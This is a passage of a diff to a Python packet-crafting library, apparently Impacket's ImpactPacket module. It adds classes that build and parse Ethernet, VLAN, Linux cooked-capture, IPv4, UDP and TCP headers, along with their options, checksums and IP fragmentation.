tail_string = property(get_tail_as_string) + + def get_packet(self): + self.__update_body_from_child() + + ret = b'' + + header = self.get_header_as_string() + if header: + ret += header + + body = self.get_body_as_string() + if body: + ret += body + + tail = self.get_tail_as_string() + if tail: + ret += tail + + return ret + +class Header(PacketBuffer,ProtocolLayer): + "This is the base class from which all protocol definitions extend." + + packet_printable = [c for c in string.printable if c not in string.whitespace] + [' '] + + ethertype = None + protocol = None + def __init__(self, length = None): + PacketBuffer.__init__(self, length) + self.auto_checksum = 1 + + def get_data_as_string(self): + "Returns all data from children of this header as string" + + if self.child(): + return self.child().get_packet() + else: + return None + + def get_packet(self): + """Returns the raw representation of this packet and its + children as a string. The output from this method is a packet + ready to be transmitted over the wire. + """ + self.calculate_checksum() + + data = self.get_data_as_string() + if data: + return self.get_buffer_as_string() + data + else: + return self.get_buffer_as_string() + + def get_size(self): + "Return the size of this header and all of it's children" + tmp_value = self.get_header_size() + if self.child(): + tmp_value = tmp_value + self.child().get_size() + return tmp_value + + def calculate_checksum(self): + "Calculate and set the checksum for this header" + pass + + def get_pseudo_header(self): + "Pseudo headers can be used to limit over what content will the checksums be calculated." + # default implementation returns empty array + return array.array('B') + + def load_header(self, aBuffer): + "Properly set the state of this instance to reflect that of the raw packet passed as argument." + self.set_bytes_from_string(aBuffer) + hdr_len = self.get_header_size() + if(len(aBuffer) < hdr_len): #we must do something like this + diff = hdr_len - len(aBuffer) + for i in range(0, diff): + aBuffer += '\x00' + self.set_bytes_from_string(aBuffer[:hdr_len]) + + def get_header_size(self): + "Return the size of this header, that is, not counting neither the size of the children nor of the parents." + raise RuntimeError("Method %s.get_header_size must be overridden." % self.__class__) + + def list_as_hex(self, aList): + if len(aList): + ltmp = [] + line = [] + count = 0 + for byte in aList: + if not (count % 2): + if (count % 16): + ltmp.append(' ') + else: + ltmp.append(' '*4) + ltmp.append(''.join(line)) + ltmp.append('\n') + line = [] + if chr(byte) in Header.packet_printable: + line.append(chr(byte)) + else: + line.append('.') + ltmp.append('%.2x' % byte) + count += 1 + if (count%16): + left = 16 - (count%16) + ltmp.append(' ' * (4+(left // 2) + (left*2))) + ltmp.append(''.join(line)) + ltmp.append('\n') + return ltmp + else: + return [] + + def __str__(self): + ltmp = self.list_as_hex(self.get_bytes().tolist()) + + if self.child(): + ltmp.append(['\n', str(self.child())]) + + if len(ltmp)>0: + return ''.join(ltmp) + else: + return '' + + + +class Data(Header): + """This packet type can hold raw data. It's normally employed to + hold a packet's innermost layer's contents in those cases for + which the protocol details are unknown, and there's a copy of a + valid packet available. + + For instance, if all that's known about a certain protocol is that + a UDP packet with its contents set to "HELLO" initiate a new + session, creating such packet is as simple as in the following code + fragment: + packet = UDP() + packet.contains('HELLO') + """ + + def __init__(self, aBuffer = None): + Header.__init__(self) + if aBuffer: + self.set_data(aBuffer) + + def set_data(self, data): + self.set_bytes_from_string(data) + + def get_size(self): + return len(self.get_bytes()) + + +class EthernetTag(PacketBuffer): + """Represents a VLAN header specified in IEEE 802.1Q and 802.1ad. + Provides methods for convenient manipulation with header fields.""" + + def __init__(self, value=0x81000000): + PacketBuffer.__init__(self, 4) + self.set_long(0, value) + + def get_tpid(self): + """Returns Tag Protocol Identifier""" + return self.get_word(0) + + def set_tpid(self, value): + """Sets Tag Protocol Identifier""" + return self.set_word(0, value) + + def get_pcp(self): + """Returns Priority Code Point""" + return (self.get_byte(2) & 0xE0) >> 5 + + def set_pcp(self, value): + """Sets Priority Code Point""" + orig_value = self.get_byte(2) + self.set_byte(2, (orig_value & 0x1F) | ((value & 0x07) << 5)) + + def get_dei(self): + """Returns Drop Eligible Indicator""" + return (self.get_byte(2) & 0x10) >> 4 + + def set_dei(self, value): + """Sets Drop Eligible Indicator""" + orig_value = self.get_byte(2) + self.set_byte(2, orig_value | 0x10 if value else orig_value & 0xEF) + + def get_vid(self): + """Returns VLAN Identifier""" + return self.get_word(2) & 0x0FFF + + def set_vid(self, value): + """Sets VLAN Identifier""" + orig_value = self.get_word(2) + self.set_word(2, (orig_value & 0xF000) | (value & 0x0FFF)) + + def __str__(self): + priorities = ( + 'Best Effort', + 'Background', + 'Excellent Effort', + 'Critical Applications', + 'Video, < 100 ms latency and jitter', + 'Voice, < 10 ms latency and jitter', + 'Internetwork Control', + 'Network Control') + + pcp = self.get_pcp() + return '\n'.join(( + '802.1Q header: 0x{0:08X}'.format(self.get_long(0)), + 'Priority Code Point: {0} ({1})'.format(pcp, priorities[pcp]), + 'Drop Eligible Indicator: {0}'.format(self.get_dei()), + 'VLAN Identifier: {0}'.format(self.get_vid()))) + + +class Ethernet(Header): + def __init__(self, aBuffer = None): + Header.__init__(self, 14) + self.tag_cnt = 0 + if(aBuffer): + self.load_header(aBuffer) + + def set_ether_type(self, aValue): + "Set ethernet data type field to 'aValue'" + self.set_word(12 + 4*self.tag_cnt, aValue) + + def get_ether_type(self): + "Return ethernet data type field" + return self.get_word(12 + 4*self.tag_cnt) + + def get_tag(self, index): + """Returns an EthernetTag initialized from index-th VLAN tag. + The tags are numbered from 0 to self.tag_cnt-1 as they appear in the frame. + It is possible to use negative indexes as well.""" + index = self.__validate_tag_index(index) + return EthernetTag(self.get_long(12+4*index)) + + def set_tag(self, index, tag): + """Sets the index-th VLAN tag to contents of an EthernetTag object. + The tags are numbered from 0 to self.tag_cnt-1 as they appear in the frame. + It is possible to use negative indexes as well.""" + index = self.__validate_tag_index(index) + pos = 12 + 4*index + for i,val in enumerate(tag.get_bytes()): + self.set_byte(pos+i, val) + + def push_tag(self, tag, index=0): + """Inserts contents of an EthernetTag object before the index-th VLAN tag. + Index defaults to 0 (the top of the stack).""" + if index < 0: + index += self.tag_cnt + pos = 12 + 4*max(0, min(index, self.tag_cnt)) + data = self.get_bytes() + data[pos:pos] = tag.get_bytes() + self.set_bytes(data) + self.tag_cnt += 1 + + def pop_tag(self, index=0): + """Removes the index-th VLAN tag and returns it as an EthernetTag object. + Index defaults to 0 (the top of the stack).""" + index = self.__validate_tag_index(index) + pos = 12 + 4*index + tag = self.get_long(pos) + data = self.get_bytes() + del data[pos:pos+4] + self.set_bytes(data) + self.tag_cnt -= 1 + return EthernetTag(tag) + + def load_header(self, aBuffer): + self.tag_cnt = 0 + while aBuffer[12+4*self.tag_cnt:14+4*self.tag_cnt] in (b'\x81\x00', b'\x88\xa8', b'\x91\x00'): + self.tag_cnt += 1 + + hdr_len = self.get_header_size() + diff = hdr_len - len(aBuffer) + if diff > 0: + aBuffer += b'\x00'*diff + self.set_bytes_from_string(aBuffer[:hdr_len]) + + def get_header_size(self): + "Return size of Ethernet header" + return 14 + 4*self.tag_cnt + + def get_packet(self): + + if self.child(): + try: + self.set_ether_type(self.child().ethertype) + except: + " an Ethernet packet may have a Data() " + pass + return Header.get_packet(self) + + def get_ether_dhost(self): + "Return 48 bit destination ethernet address as a 6 byte array" + return self.get_bytes()[0:6] + + def set_ether_dhost(self, aValue): + "Set destination ethernet address from 6 byte array 'aValue'" + for i in range(0, 6): + self.set_byte(i, aValue[i]) + + def get_ether_shost(self): + "Return 48 bit source ethernet address as a 6 byte array" + return self.get_bytes()[6:12] + + def set_ether_shost(self, aValue): + "Set source ethernet address from 6 byte array 'aValue'" + for i in range(0, 6): + self.set_byte(i + 6, aValue[i]) + + @staticmethod + def as_eth_addr(anArray): + tmp_list = [x > 15 and '%x'%x or '0%x'%x for x in anArray] + return '' + reduce(lambda x, y: x+':'+y, tmp_list) + + def __str__(self): + tmp_str = 'Ether: ' + self.as_eth_addr(self.get_ether_shost()) + ' -> ' + tmp_str += self.as_eth_addr(self.get_ether_dhost()) + if self.child(): + tmp_str += '\n' + str( self.child()) + return tmp_str + + def __validate_tag_index(self, index): + """Adjusts negative indices to their absolute equivalents. + Raises IndexError when out of range <0, self.tag_cnt-1>.""" + if index < 0: + index += self.tag_cnt + if index < 0 or index >= self.tag_cnt: + raise IndexError("Tag index out of range") + return index + +# Linux "cooked" capture encapsulation. +# Used, for instance, for packets returned by the "any" interface. +class LinuxSLL(Header): + type_descriptions = [ + "sent to us by somebody else", + "broadcast by somebody else", + "multicast by somebody else", + "sent to somebody else to somebody else", + "sent by us", + ] + + def __init__(self, aBuffer = None): + Header.__init__(self, 16) + if (aBuffer): + self.load_header(aBuffer) + + def set_type(self, type): + "Sets the packet type field to type" + self.set_word(0, type) + + def get_type(self): + "Returns the packet type field" + return self.get_word(0) + + def set_arphdr(self, value): + "Sets the ARPHDR value for the link layer device type" + self.set_word(2, type) + + def get_arphdr(self): + "Returns the ARPHDR value for the link layer device type" + return self.get_word(2) + + def set_addr_len(self, len): + "Sets the length of the sender's address field to len" + self.set_word(4, len) + + def get_addr_len(self): + "Returns the length of the sender's address field" + return self.get_word(4) + + def set_addr(self, addr): + "Sets the sender's address field to addr. Addr must be at most 8-byte long." + if (len(addr) < 8): + addr += b'\0' * (8 - len(addr)) + self.get_bytes()[6:14] = addr + + def get_addr(self): + "Returns the sender's address field" + return self.get_bytes()[6:14].tostring() + + def set_ether_type(self, aValue): + "Set ethernet data type field to 'aValue'" + self.set_word(14, aValue) + + def get_ether_type(self): + "Return ethernet data type field" + return self.get_word(14) + + def get_header_size(self): + "Return size of packet header" + return 16 + + def get_packet(self): + if self.child(): + self.set_ether_type(self.child().ethertype) + return Header.get_packet(self) + + def get_type_desc(self): + type = self.get_type() + if type < len(LinuxSLL.type_descriptions): + return LinuxSLL.type_descriptions[type] + else: + return "Unknown" + + def __str__(self): + ss = [] + alen = self.get_addr_len() + addr = hexlify(self.get_addr()[0:alen]) + ss.append("Linux SLL: addr=%s type=`%s'" % (addr, self.get_type_desc())) + if self.child(): + ss.append(str(self.child())) + + return '\n'.join(ss) + + +class IP(Header): + ethertype = 0x800 + def __init__(self, aBuffer = None): + Header.__init__(self, 20) + self.set_ip_v(4) + self.set_ip_hl(5) + self.set_ip_ttl(255) + self.__option_list = [] + if(aBuffer): + # When decoding, checksum shouldn't be modified + self.auto_checksum = 0 + self.load_header(aBuffer) + + if sys.platform.count('bsd'): + self.is_BSD = True + else: + self.is_BSD = False + + + def get_packet(self): + # set protocol + if self.get_ip_p() == 0 and self.child(): + self.set_ip_p(self.child().protocol) + + # set total length + if self.get_ip_len() == 0: + self.set_ip_len(self.get_size()) + + child_data = self.get_data_as_string() + + if self.auto_checksum: + self.reset_ip_sum() + + my_bytes = self.get_bytes() + + for op in self.__option_list: + my_bytes.extend(op.get_bytes()) + + # Pad to a multiple of 4 bytes + num_pad = (4 - (len(my_bytes) % 4)) % 4 + if num_pad: + my_bytes.fromstring(b"\0"* num_pad) + + # only change ip_hl value if options are present + if len(self.__option_list): + self.set_ip_hl(len(my_bytes) // 4) + + + # set the checksum if the user hasn't modified it + if self.auto_checksum: + self.set_ip_sum(self.compute_checksum(my_bytes)) + + if child_data is None: + return my_bytes.tostring() + else: + return my_bytes.tostring() + child_data + + + + # def calculate_checksum(self, buffer = None): + # tmp_value = self.get_ip_sum() + # if self.auto_checksum and (not tmp_value): + # if buffer: + # tmp_bytes = buffer + # else: + # tmp_bytes = self.bytes[0:self.get_header_size()] + # + # self.set_ip_sum(self.compute_checksum(tmp_bytes)) + + + def get_pseudo_header(self): + pseudo_buf = array.array("B") + pseudo_buf.extend(self.get_bytes()[12:20]) + pseudo_buf.fromlist([0]) + pseudo_buf.extend(self.get_bytes()[9:10]) + tmp_size = self.child().get_size() + + size_str = struct.pack("!H", tmp_size) + + pseudo_buf.fromstring(size_str) + return pseudo_buf + + def add_option(self, option): + self.__option_list.append(option) + sum = 0 + for op in self.__option_list: + sum += op.get_len() + if sum > 40: + raise ImpactPacketException("Options overflowed in IP packet with length: %d" % sum) + + + def get_ip_v(self): + n = self.get_byte(0) + return (n >> 4) + + def set_ip_v(self, value): + n = self.get_byte(0) + version = value & 0xF + n = n & 0xF + n = n | (version << 4) + self.set_byte(0, n) + + def get_ip_hl(self): + n = self.get_byte(0) + return (n & 0xF) + + def set_ip_hl(self, value): + n = self.get_byte(0) + len = value & 0xF + n = n & 0xF0 + n = (n | len) + self.set_byte(0, n) + + def get_ip_tos(self): + return self.get_byte(1) + + def set_ip_tos(self,value): + self.set_byte(1, value) + + def get_ip_len(self): + if self.is_BSD: + return self.get_word(2, order = '=') + else: + return self.get_word(2) + + def set_ip_len(self, value): + if self.is_BSD: + self.set_word(2, value, order = '=') + else: + self.set_word(2, value) + + def get_ip_id(self): + return self.get_word(4) + def set_ip_id(self, value): + return self.set_word(4, value) + + def get_ip_off(self): + if self.is_BSD: + return self.get_word(6, order = '=') + else: + return self.get_word(6) + + def set_ip_off(self, aValue): + if self.is_BSD: + self.set_word(6, aValue, order = '=') + else: + self.set_word(6, aValue) + + def get_ip_offmask(self): + return self.get_ip_off() & 0x1FFF + + def set_ip_offmask(self, aValue): + tmp_value = self.get_ip_off() & 0xD000 + tmp_value |= aValue + self.set_ip_off(tmp_value) + + def get_ip_rf(self): + return self.get_ip_off() & 0x8000 + + def set_ip_rf(self, aValue): + tmp_value = self.get_ip_off() + if aValue: + tmp_value |= 0x8000 + else: + my_not = 0xFFFF ^ 0x8000 + tmp_value &= my_not + self.set_ip_off(tmp_value) + + def get_ip_df(self): + return self.get_ip_off() & 0x4000 + + def set_ip_df(self, aValue): + tmp_value = self.get_ip_off() + if aValue: + tmp_value |= 0x4000 + else: + my_not = 0xFFFF ^ 0x4000 + tmp_value &= my_not + self.set_ip_off(tmp_value) + + def get_ip_mf(self): + return self.get_ip_off() & 0x2000 + + def set_ip_mf(self, aValue): + tmp_value = self.get_ip_off() + if aValue: + tmp_value |= 0x2000 + else: + my_not = 0xFFFF ^ 0x2000 + tmp_value &= my_not + self.set_ip_off(tmp_value) + + + def fragment_by_list(self, aList): + if self.child(): + proto = self.child().protocol + else: + proto = 0 + + child_data = self.get_data_as_string() + if not child_data: + return [self] + + ip_header_bytes = self.get_bytes() + current_offset = 0 + fragment_list = [] + + for frag_size in aList: + ip = IP() + ip.set_bytes(ip_header_bytes) # copy of original header + ip.set_ip_p(proto) + + + if frag_size % 8: # round this fragment size up to next multiple of 8 + frag_size += 8 - (frag_size % 8) + + + ip.set_ip_offmask(current_offset // 8) + current_offset += frag_size + + data = Data(child_data[:frag_size]) + child_data = child_data[frag_size:] + + ip.set_ip_len(20 + data.get_size()) + ip.contains(data) + + + if child_data: + + ip.set_ip_mf(1) + + fragment_list.append(ip) + else: # no more data bytes left to add to fragments + + ip.set_ip_mf(0) + + fragment_list.append(ip) + return fragment_list + + if child_data: # any remaining data? + # create a fragment containing all of the remaining child_data + ip = IP() + ip.set_bytes(ip_header_bytes) + ip.set_ip_offmask(current_offset) + ip.set_ip_len(20 + len(child_data)) + data = Data(child_data) + ip.contains(data) + fragment_list.append(ip) + + return fragment_list + + + def fragment_by_size(self, aSize): + data_len = len(self.get_data_as_string()) + num_frags = data_len // aSize + + if data_len % aSize: + num_frags += 1 + + size_list = [] + for i in range(0, num_frags): + size_list.append(aSize) + return self.fragment_by_list(size_list) + + + def get_ip_ttl(self): + return self.get_byte(8) + def set_ip_ttl(self, value): + self.set_byte(8, value) + + def get_ip_p(self): + return self.get_byte(9) + + def set_ip_p(self, value): + self.set_byte(9, value) + + def get_ip_sum(self): + return self.get_word(10) + def set_ip_sum(self, value): + self.auto_checksum = 0 + self.set_word(10, value) + + def reset_ip_sum(self): + self.set_ip_sum(0x0000) + self.auto_checksum = 1 + + def get_ip_src(self): + return self.get_ip_address(12) + def set_ip_src(self, value): + self.set_ip_address(12, value) + + def get_ip_dst(self): + return self.get_ip_address(16) + + def set_ip_dst(self, value): + self.set_ip_address(16, value) + + def get_header_size(self): + op_len = 0 + for op in self.__option_list: + op_len += op.get_len() + + num_pad = (4 - (op_len % 4)) % 4 + + return 20 + op_len + num_pad + + def load_header(self, aBuffer): + self.set_bytes_from_string(aBuffer[:20]) + opt_left = (self.get_ip_hl() - 5) * 4 + opt_bytes = array.array('B', aBuffer[20:(20 + opt_left)]) + if len(opt_bytes) != opt_left: + raise ImpactPacketException("Cannot load options from truncated packet") + + + while opt_left: + op_type = opt_bytes[0] + if op_type == IPOption.IPOPT_EOL or op_type == IPOption.IPOPT_NOP: + new_option = IPOption(op_type) + op_len = 1 + else: + op_len = opt_bytes[1] + if op_len > len(opt_bytes): + raise ImpactPacketException("IP Option length is too high") + + new_option = IPOption(op_type, op_len) + new_option.set_bytes(opt_bytes[:op_len]) + + opt_bytes = opt_bytes[op_len:] + opt_left -= op_len + self.add_option(new_option) + if op_type == IPOption.IPOPT_EOL: + break + + + def __str__(self): + flags = ' ' + if self.get_ip_df(): + flags += 'DF ' + if self.get_ip_mf(): + flags += 'MF ' + if self.get_ip_rf(): + flags += 'RF ' + tmp_str = 'IP%s%s -> %s ' % (flags, self.get_ip_src(),self.get_ip_dst()) + for op in self.__option_list: + tmp_str += '\n' + str(op) + if self.child(): + tmp_str += '\n' + str(self.child()) + return tmp_str + + +class IPOption(PacketBuffer): + IPOPT_EOL = 0 + IPOPT_NOP = 1 + IPOPT_RR = 7 + IPOPT_TS = 68 + IPOPT_LSRR = 131 + IPOPT_SSRR = 137 + + def __init__(self, opcode = 0, size = None): + if size and (size < 3 or size > 40): + raise ImpactPacketException("IP Options must have a size between 3 and 40 bytes") + + if(opcode == IPOption.IPOPT_EOL): + PacketBuffer.__init__(self, 1) + self.set_code(IPOption.IPOPT_EOL) + elif(opcode == IPOption.IPOPT_NOP): + PacketBuffer.__init__(self, 1) + self.set_code(IPOption.IPOPT_NOP) + elif(opcode == IPOption.IPOPT_RR): + if not size: + size = 39 + PacketBuffer.__init__(self, size) + self.set_code(IPOption.IPOPT_RR) + self.set_len(size) + self.set_ptr(4) + + elif(opcode == IPOption.IPOPT_LSRR): + if not size: + size = 39 + PacketBuffer.__init__(self, size) + self.set_code(IPOption.IPOPT_LSRR) + self.set_len(size) + self.set_ptr(4) + + elif(opcode == IPOption.IPOPT_SSRR): + if not size: + size = 39 + PacketBuffer.__init__(self, size) + self.set_code(IPOption.IPOPT_SSRR) + self.set_len(size) + self.set_ptr(4) + + elif(opcode == IPOption.IPOPT_TS): + if not size: + size = 40 + PacketBuffer.__init__(self, size) + self.set_code(IPOption.IPOPT_TS) + self.set_len(size) + self.set_ptr(5) + self.set_flags(0) + else: + if not size: + raise ImpactPacketException("Size required for this type") + PacketBuffer.__init__(self,size) + self.set_code(opcode) + self.set_len(size) + + + def append_ip(self, ip): + op = self.get_code() + if not (op == IPOption.IPOPT_RR or op == IPOption.IPOPT_LSRR or op == IPOption.IPOPT_SSRR or op == IPOption.IPOPT_TS): + raise ImpactPacketException("append_ip() not support for option type %d" % self.opt_type) + + p = self.get_ptr() + if not p: + raise ImpactPacketException("append_ip() failed, option ptr uninitialized") + + if (p + 4) > self.get_len(): + raise ImpactPacketException("append_ip() would overflow option") + + self.set_ip_address(p - 1, ip) + p += 4 + self.set_ptr(p) + + + def set_code(self, value): + self.set_byte(0, value) + + def get_code(self): + return self.get_byte(0) + + + def set_flags(self, flags): + if not (self.get_code() == IPOption.IPOPT_TS): + raise ImpactPacketException("Operation only supported on Timestamp option") + self.set_byte(3, flags) + + def get_flags(self, flags): + if not (self.get_code() == IPOption.IPOPT_TS): + raise ImpactPacketException("Operation only supported on Timestamp option") + return self.get_byte(3) + + + def set_len(self, len): + self.set_byte(1, len) + + + def set_ptr(self, ptr): + self.set_byte(2, ptr) + + def get_ptr(self): + return self.get_byte(2) + + def get_len(self): + return len(self.get_bytes()) + + + def __str__(self): + map = {IPOption.IPOPT_EOL : "End of List ", + IPOption.IPOPT_NOP : "No Operation ", + IPOption.IPOPT_RR : "Record Route ", + IPOption.IPOPT_TS : "Timestamp ", + IPOption.IPOPT_LSRR : "Loose Source Route ", + IPOption.IPOPT_SSRR : "Strict Source Route "} + + tmp_str = "\tIP Option: " + op = self.get_code() + if op in map: + tmp_str += map[op] + else: + tmp_str += "Code: %d " % op + + if op == IPOption.IPOPT_RR or op == IPOption.IPOPT_LSRR or op ==IPOption.IPOPT_SSRR: + tmp_str += self.print_addresses() + + + return tmp_str + + + def print_addresses(self): + p = 3 + tmp_str = "[" + if self.get_len() >= 7: # at least one complete IP address + while 1: + if p + 1 == self.get_ptr(): + tmp_str += "#" + tmp_str += self.get_ip_address(p) + p += 4 + if p >= self.get_len(): + break + else: + tmp_str += ", " + tmp_str += "] " + if self.get_ptr() % 4: # ptr field should be a multiple of 4 + tmp_str += "nonsense ptr field: %d " % self.get_ptr() + return tmp_str + + +class UDP(Header): + protocol = 17 + def __init__(self, aBuffer = None): + Header.__init__(self, 8) + if(aBuffer): + self.load_header(aBuffer) + + def get_uh_sport(self): + return self.get_word(0) + def set_uh_sport(self, value): + self.set_word(0, value) + + def get_uh_dport(self): + return self.get_word(2) + def set_uh_dport(self, value): + self.set_word(2, value) + + def get_uh_ulen(self): + return self.get_word(4) + + def set_uh_ulen(self, value): + self.set_word(4, value) + + def get_uh_sum(self): + return self.get_word(6) + + def set_uh_sum(self, value): + self.set_word(6, value) + self.auto_checksum = 0 + + def calculate_checksum(self): + if self.auto_checksum and (not self.get_uh_sum()): + # if there isn't a parent to grab a pseudo-header from we'll assume the user knows what they're doing + # and won't meddle with the checksum or throw an exception + if not self.parent(): + return + + buffer = self.parent().get_pseudo_header() + + buffer += self.get_bytes() + data = self.get_data_as_string() + if(data): + buffer.fromstring(data) + self.set_uh_sum(self.compute_checksum(buffer)) + + def get_header_size(self): + return 8 + + def __str__(self): + tmp_str = 'UDP %d -> %d' % (self.get_uh_sport(), self.get_uh_dport()) + if self.child(): + tmp_str += '\n' + str(self.child()) + return tmp_str + + def get_packet(self): + # set total length + if(self.get_uh_ulen() == 0): + self.set_uh_ulen(self.get_size()) + return Header.get_packet(self) + +class TCP(Header): + protocol = 6 + TCP_FLAGS_MASK = 0x00FF # lowest 16 bits are the flags + def __init__(self, aBuffer = None): + Header.__init__(self, 20) + self.set_th_off(5) + self.__option_list = [] + if aBuffer: + self.load_header(aBuffer) + + def add_option(self, option): + self.__option_list.append(option) + + sum = 0 + for op in self.__option_list: + sum += op.get_size() + + if sum > 40: + raise ImpactPacketException("Cannot add TCP option, would overflow option space") + + def get_options(self): + return self.__option_list + + def swapSourceAndDestination(self): + oldSource = self.get_th_sport() + self.set_th_sport(self.get_th_dport()) + self.set_th_dport(oldSource) + + # + # Header field accessors + # + + def set_th_sport(self, aValue): + self.set_word(0, aValue) + + def get_th_sport(self): + return self.get_word(0) + + def get_th_dport(self): + return self.get_word(2) + + def set_th_dport(self, aValue): + self.set_word(2, aValue) + + def get_th_seq(self): + return self.get_long(4) + + def set_th_seq(self, aValue): + self.set_long(4, aValue) + + def get_th_ack(self): + return self.get_long(8) + + def set_th_ack(self, aValue): + self.set_long(8, aValue) + + def get_th_flags(self): + return self.get_word(12) & self.TCP_FLAGS_MASK + + def set_th_flags(self, aValue): + masked = self.get_word(12) & (~self.TCP_FLAGS_MASK) + nb = masked | (aValue & self.TCP_FLAGS_MASK) + return self.set_word(12, nb, ">") + + def get_th_win(self): + return self.get_word(14) + + def set_th_win(self, aValue): + self.set_word(14, aValue) + + def set_th_sum(self, aValue): + self.set_word(16, aValue) + self.auto_checksum = 0 + + def get_th_sum(self): + return self.get_word(16) + + def get_th_urp(self): + return self.get_word(18) + + def set_th_urp(self, aValue): + return self.set_word(18, aValue) + + # Flag accessors + + def get_th_reserved(self): + tmp_value = self.get_byte(12) & 0x0f + return tmp_value + + + def get_th_off(self): + tmp_value = self.get_byte(12) >> 4 + return tmp_value + + def set_th_off(self, aValue): + mask = 0xF0 + masked = self.get_byte(12) & (~mask) + nb = masked | ( (aValue << 4) & mask) + return self.set_byte(12, nb) + + def get_CWR(self): + return self.get_flag(128) + def set_CWR(self): + return self.set_flags(128) + def reset_CWR(self): + return self.reset_flags(128) + + def get_ECE(self): + return self.get_flag(64) + def set_ECE(self): + return self.set_flags(64) + def reset_ECE(self): + return self.reset_flags(64) + + def get_URG(self): + return self.get_flag(32) + def set_URG(self): + return self.set_flags(32) + def reset_URG(self): + return self.reset_flags(32) + + def get_ACK(self): + return self.get_flag(16) + def set_ACK(self): + return self.set_flags(16) + def reset_ACK(self): + return self.reset_flags(16) + + def get_PSH(self): + return self.get_flag(8) + def set_PSH(self): + return self.set_flags(8) + def reset_PSH(self): + return self.reset_flags(8) + + def get_RST(self): + return self.get_flag(4) + def set_RST(self): + return self.set_flags(4) + def reset_RST(self): + return self.reset_flags(4) + + def get_SYN(self): + return self.get_flag(2) + def set_SYN(self): + return self.set_flags(2) + def reset_SYN(self): + return self.reset_flags(2) + + def get_FIN(self): + return self.get_flag(1) + def set_FIN(self): + return self.set_flags(1) + def reset_FIN(self): + return self.reset_flags(1) + + # Overridden Methods + + def get_header_size(self): + return 20 + len(self.get_padded_options()) + + def calculate_checksum(self): + if not self.auto_checksum or not self.parent(): + return + + self.set_th_sum(0) + buffer = self.parent().get_pseudo_header() + buffer += self.get_bytes() + buffer += self.get_padded_options() + + data = self.get_data_as_string() + if(data): + buffer.fromstring(data) + + res = self.compute_checksum(buffer) + + self.set_th_sum(self.compute_checksum(buffer)) + + def get_packet(self): + "Returns entire packet including child data as a string. This is the function used to extract the final packet" + + # only change th_off value if options are present + if len(self.__option_list): + self.set_th_off(self.get_header_size() // 4) + + self.calculate_checksum() + + bytes = self.get_bytes() + self.get_padded_options() + data = self.get_data_as_string() + + if data: + return bytes.tostring() + data + else: + return bytes.tostring() + + def load_header(self, aBuffer): + self.set_bytes_from_string(aBuffer[:20]) + opt_left = (self.get_th_off() - 5) * 4 + opt_bytes = array.array('B', aBuffer[20:(20 + opt_left)]) + if len(opt_bytes) != opt_left: + raise ImpactPacketException("Cannot load options from truncated packet") + + while opt_left: + op_kind = opt_bytes[0] + if op_kind == TCPOption.TCPOPT_EOL or op_kind == TCPOption.TCPOPT_NOP: + new_option = TCPOption(op_kind) + op_len = 1 + else: + op_len = opt_bytes[1] + if op_len > len(opt_bytes): + raise ImpactPacketException("TCP Option length is too high") + if op_len < 2: + raise ImpactPacketException("TCP Option length is too low") + + new_option = TCPOption(op_kind) + new_option.set_bytes(opt_bytes[:op_len]) + + opt_bytes = opt_bytes[op_len:] + opt_left -= op_len + self.add_option(new_option) + if op_kind == TCPOption.TCPOPT_EOL: + break + + # + # Private + # + + def get_flag(self, bit): + if self.get_th_flags() & bit: + return 1 + else: + return 0 + + def reset_flags(self, aValue): + tmp_value = self.get_th_flags() & (~aValue) + return self.set_th_flags(tmp_value) + + def set_flags(self, aValue): + tmp_value = self.get_th_flags() | aValue + return self.set_th_flags(tmp_value) + + def get_padded_options(self): + "Return an array containing all options padded to a 4 byte boundary" + op_buf = array.array('B') + for op in self.__option_list: + op_buf += op.get_bytes() + num_pad = (4 - (len(op_buf) % 4)) % 4 + if num_pad: + op_buf.fromstring("\0" * num_pad) + return op_buf + + def __str__(self): + tmp_str = 'TCP ' + if self.get_ECE(): + tmp_str += 'ece ' + if self.get_CWR(): + tmp_str += 'cwr ' + if self.get_ACK(): + tmp_str += 'ack ' + if self.get_FIN(): + tmp_str += 'fin ' + if self.get_PSH(): + tmp_str += 'push ' + if self.get_RST(): + tmp_str += 'rst ' + if self.get_SYN(): + tmp_str += 'syn ' + if self.get_URG(): + tmp_str += 'urg ' + tmp_str += '%d -> %d' % (self.get_th_sport(), self.get_th_dport()) + for op in self.__option_list: + tmp_str += '\n' + str(op) + + if self.child(): + tmp_str += '\n' + str(self.child()) + return tmp_str + + +class TCPOption(PacketBuffer): + TCPOPT_EOL = 0 + TCPOPT_NOP = 1 + TCPOPT_MAXSEG = 2 + TCPOPT_WINDOW = 3 + TCPOPT_SACK_PERMITTED = 4 + TCPOPT_SACK = 5 + TCPOPT_TIMESTAMP = 8 + TCPOPT_SIGNATURE = 19 + + + def __init__(self, kind, data = None): + + if kind == TCPOption.TCPOPT_EOL: + PacketBuffer.__init__(self, 1) + self.set_kind(TCPOption.TCPOPT_EOL) + elif kind == TCPOption.TCPOPT_NOP: + PacketBuffer.__init__(self, 1) + self.set_kind(TCPOption.TCPOPT_NOP) + elif kind == TCPOption.TCPOPT_MAXSEG: + PacketBuffer.__init__(self, 4) + self.set_kind(TCPOption.TCPOPT_MAXSEG) + self.set_len(4) + if data: + self.set_mss(data) + else: + self.set_mss(512) + elif kind == TCPOption.TCPOPT_WINDOW: + PacketBuffer.__init__(self, 3) + self.set_kind(TCPOption.TCPOPT_WINDOW) + self.set_len(3) + if data: + self.set_shift_cnt(data) + else: + self.set_shift_cnt(0) + elif kind == TCPOption.TCPOPT_TIMESTAMP: + PacketBuffer.__init__(self, 10) + self.set_kind(TCPOption.TCPOPT_TIMESTAMP) + self.set_len(10) + if data: + self.set_ts(data) + else: + self.set_ts(0) + elif kind == TCPOption.TCPOPT_SACK_PERMITTED: + PacketBuffer.__init__(self, 2) + self.set_kind(TCPOption.TCPOPT_SACK_PERMITTED) + self.set_len(2) + + elif kind == TCPOption.TCPOPT_SACK: + PacketBuffer.__init__(self, 2) + self.set_kind(TCPOption.TCPOPT_SACK) + + def set_left_edge(self, aValue): + self.set_long (2, aValue) + + def set_right_edge(self, aValue): + self.set_long (6, aValue) + + def set_kind(self, kind): + self.set_byte(0, kind) + + + def get_kind(self): + return self.get_byte(0) + + + def set_len(self, len): + if self.get_size() < 2: + raise ImpactPacketException("Cannot set length field on an option having a size smaller than 2 bytes") + self.set_byte(1, len) + + def get_len(self): + if self.get_size() < 2: + raise ImpactPacketException("Cannot retrieve length field from an option having a size smaller than 2 bytes") + return self.get_byte(1) + + def get_size(self): + return len(self.get_bytes()) + + + def set_mss(self, len): + if self.get_kind() != TCPOption.TCPOPT_MAXSEG: + raise ImpactPacketException("Can only set MSS on TCPOPT_MAXSEG option") + self.set_word(2, len) + + def 